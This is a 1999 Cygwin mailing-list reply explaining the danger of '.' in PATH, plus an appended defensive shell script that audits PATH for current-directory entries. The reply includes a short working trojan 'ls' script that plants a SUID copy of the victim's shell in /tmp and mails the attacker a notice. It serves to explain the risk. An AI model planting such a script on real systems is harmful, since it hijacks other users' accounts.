"." in $PATH
Michael Wood
wood@kingsley.co.za
Sun Jan 31 23:52:00 GMT 1999
Hi
-----Original Message-----
From: Will Mooar <willm@ihug.co.nz>
To: SWarsMatt@aol.com <SWarsMatt@aol.com>; gnu-win32@cygnus.com
<gnu-win32@cygnus.com>
Date: Monday, January 11, 1999 5:12 PM
Subject: Re: Problem with /bin mount?
>This is normal for unix (and cygwin) - it only searches for applications to
>run from the PATH environment variable. If "." is not in the PATH, it won't
>find configure in the current directory.
>
>I have seen people mention that this is generally a bad idea, as it may pose
>a security threat. Unfortunately, no-one has elaborated why. I can't see
>why it would be a problem for windows, except that it might accidentally run
>the wrong thing if two or more programs exist with the same name, but
>function differently.
This is exactly what the security risk is.
If the default path on a machine looks like this:
.:/bin:/usr/bin:/usr/local/bin
and I put the following script in /tmp:
#!/bin/sh
cp /bin/sh /tmp/.sh.$$
chown $UID /tmp/.sh.$$
chmod 4755 /tmp/.sh.$$
echo "$$" | mail -s "Got one" me
ls $*
and call it "ls", I could collect shells for other people's accounts by
waiting for them to cd to /tmp and type "ls".
If "." is last in the path, I would have to name the script something like
"sl" and wait for a typo.
If the person with . in their path is root, the problem is much worse.
The script could also try to delete files instead of creating a SUID shell
or do something else as the user executing it.
--
Michael Wood | Kingsley Technologies
wood@kingsley.co.za | Tel: +27 21 762 0276
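The message above turns on where "." sits in PATH: first means any plain command name typed in a writable directory can be hijacked, last means the attacker has to wait for a typo. The following POSIX sh audit helper is an added example, not part of the original message or of Cygwin; it scans a PATH value for entries that resolve to the current directory (a literal ".", a relative entry, or an empty field, since a leading ":", trailing ":" or "::" also means "."), reports their positions, and classifies the exposure as first, last, middle or none. The function names and the output format are my own choices.

```sh
#!/bin/sh
# Added example (not from the original message): audit a PATH string for
# entries that resolve to the current working directory.

# Print each entry that resolves under the current directory, one per line,
# as "index:entry".  An empty field is shown as "<empty>" because an empty
# PATH element is treated as "." by the shell.
path_cwd_entries() {
    _i=0
    _rest="$1:"                       # trailing ":" so the last field is processed too
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        _i=$((_i + 1))
        case "$_entry" in
            "")  printf '%d:<empty>\n' "$_i" ;;   # empty field == "."
            /*)  ;;                               # absolute entry: not a cwd lookup
            *)   printf '%d:%s\n' "$_i" "$_entry" ;;   # "." or any relative entry
        esac
    done
}

# True (exit 0) when the PATH contains at least one current-directory entry.
path_has_cwd() {
    [ -n "$(path_cwd_entries "$1")" ]
}

# Classify the exposure described in the message:
#   first  - "." (or equivalent) is searched before the system directories,
#            so a trojan "ls" in a shared directory is run as typed;
#   last   - only reached after every real directory, so only a typo
#            ("sl") or a genuinely missing command hits it;
#   middle - shadows whatever comes after it;
#   none   - no current-directory entry at all.
path_cwd_risk() {
    _total=0
    _firstcwd=0
    _lastcwd=0
    _rest="$1:"
    while [ -n "$_rest" ]; do
        _entry="${_rest%%:*}"
        _rest="${_rest#*:}"
        _total=$((_total + 1))
        case "$_entry" in
            /*) ;;
            *)  if [ "$_firstcwd" -eq 0 ]; then _firstcwd=$_total; fi
                _lastcwd=$_total ;;
        esac
    done
    if [ "$_firstcwd" -eq 0 ]; then echo none
    elif [ "$_firstcwd" -eq 1 ]; then echo first
    elif [ "$_lastcwd" -eq "$_total" ]; then echo last
    else echo middle
    fi
}

# Usage: report on the PATH of the shell running this script.
printf 'current-directory entries: %s\n' "$(path_cwd_entries "$PATH" | tr '\n' ' ')"
printf 'exposure: %s\n' "$(path_cwd_risk "$PATH")"
```

Run it from a login shell (or pass a PATH string to the functions directly) to see whether the default path on a machine matches the ".:/bin:/usr/bin:/usr/local/bin" shape the message warns about; the fix is simply to drop the entry and invoke local scripts as ./configure.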
-
For help on using this list (especially unsubscribing), send a message to
"gnu-win32-request@cygnus.com" with one line of text: "help".